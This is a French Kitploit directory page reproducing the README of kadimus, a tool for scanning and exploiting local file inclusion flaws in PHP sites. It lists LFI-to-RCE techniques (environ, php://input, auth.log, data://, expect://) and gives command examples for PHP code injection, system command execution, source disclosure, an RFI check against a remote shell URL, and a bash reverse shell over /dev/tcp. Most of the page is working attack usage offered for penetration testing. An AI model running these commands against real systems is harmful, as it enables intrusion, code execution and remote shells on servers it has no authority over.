Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/p0cl4bs/kadimus
Scanners de VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus est un outil pour vérifier et exploiter la vulnérabilité LFI.

Voir le dépôt
5751273il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

Outil de scan et d'exploitation LFI

kadimus est un outil pour vérifier et exploiter les vulnérabilités LFI, avec un accent sur les systèmes PHP.

Fonctionnalités :

  • Vérifier tous les paramètres d'URL
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • Divulgation du code source
Télécharger l’outil
  • Interface shell de commande via requête HTTP
  • Support proxy (socks4://, socks4a://, socks5:// ,socks5h:// et http://)
  • Support proxy socks5 pour les connexions distantes
  • Compilation :

    Tout d'abord, assurez-vous d'avoir toutes les dépendances installées sur votre système : libcurl, libopenssl, libpcre et libssh.

    Ensuite, vous pouvez cloner le dépôt pour obtenir le code source :

    root@kitploit:~
    $ git clone https://github.com/P0cL4bs/kadimus.git
    $ cd kadimus
    

    Et enfin :

    root@kitploit:~
    $ make
    

    Options :

    root@kitploit:~
    Options:
      -h, --help                    Display this help menu
    
      Request:
        -B, --cookie STRING         Set custom HTTP cookie header
        -A, --user-agent STRING     User-Agent to send to server
        --connect-timeout SECONDS   Maximum time allowed for connection
        --retry NUMBER              Number of times to retry if connection fails
        --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)
    
      Scanner:
        -u, --url STRING            URL to scan/exploit
        -o, --output FILE           File to save output results
    
      Explotation:
        --parameter STRING          Parameter name to inject exploit
                                    (only needed by RCE data and source disclosure)
    
      RCE:
        -T, --technique=TECH        LFI to RCE technique to use
        -C, --code STRING           Custom PHP code to execute, with php brackets
        -c, --cmd STRING            Execute system command on vulnerable target system
        -s, --shell                 Simple command shell interface through HTTP request
    
        --connect STRING            IP/hostname to connect to
        -p, --port NUMBER           Port number to connect to or listen on
        -l, --listen                Bind and listen for incoming connections
    
        --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
        --ssh-target STRING         Set the SSH host
    
        RCE Available techniques
    
          environ                   Try to run PHP code using /proc/self/environ
          input                     Try to run PHP code using php://input
          auth                      Try to run PHP code using /var/log/auth.log
          data                      Try to run PHP code using data://text
          expect                    Try to run a command using expect://cmd
    
        Source Disclosure:
          -S, --source              Try to get the source file using filter://
          -f, --filename STRING     Set filename to grab source [REQUIRED]
          -O FILE                   Set output file (default: stdout)
    
    

    Exemples :

    Analyse :

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact -A my_user_agent
    

    Obtenir le code source du fichier :

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
    

    Exécuter du code PHP :

    root@kitploit:~
    ./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input
    

    Exécuter une commande :

    root@kitploit:~
    ./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
    

    Vérification des RFI :

    Vous pouvez également vérifier les erreurs RFI -- placez simplement l'URL distante dans resource/common_files.txt et l'expression régulière pour les identifier, exemple :

    root@kitploit:~
    /* http://bad-url.com/shell.txt */
    <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
    

    dans le fichier :

    root@kitploit:~
    http://bad-url.com/shell.txt?:scorpion say get over here
    

    Shell inversé :

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
    

    Contributing

    Vous pouvez aider avec du code, ou en faisant un don. Si vous souhaitez aider avec du code, utilisez le style de code du noyau comme référence.

    Paypal:

    BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq